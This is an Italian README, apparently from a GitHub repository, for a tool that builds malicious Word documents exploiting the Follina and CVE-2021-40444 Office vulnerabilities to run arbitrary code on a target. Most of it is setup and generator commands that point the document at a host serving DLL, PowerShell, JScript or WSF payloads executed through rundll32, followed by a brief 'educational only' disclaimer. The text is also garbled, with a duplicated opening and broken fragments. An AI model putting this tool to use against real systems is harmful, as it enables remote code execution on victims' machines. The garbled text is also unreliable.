
Questo repository contiene script e risorse per sfruttare le vulnerabilità Follina CVE e CVE-2021-40444 in Microsoft Office. Gli script generano file di documenti dannosi che possono eseguire codice arbitrario sul sistema di destinazione.
Questo repository contiene script e risorse per sfruttare le vulnerabilità Follina CVE e CVE-2021-40444 in Microsoft Office. Gli script generano file di documento dannosi in grado di eseguire codice arbitrario sul sistema di destinazione.
requirements.txt)Configurazione Flare VM:
labpasswordPython e ambiente virtuale:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv usando il seguente comando:
pip install virtualenv
venv:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
Generazione dell'exploit:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 con il tuo indirizzo IP.Accesso al documento generato:
.docx generato si troverà nella directory:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx) viene aperto.document.xml.rels.%TEMP%Low.rundll32.generator.pycab_parser.pyrequirements.txt.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
Questo progetto è solo a scopo educativo. Usalo responsabilmente e non sfruttare vulnerabilità su sistemi per i quali non hai il permesso di testare. Un uso improprio di queste informazioni può portare a accuse penali.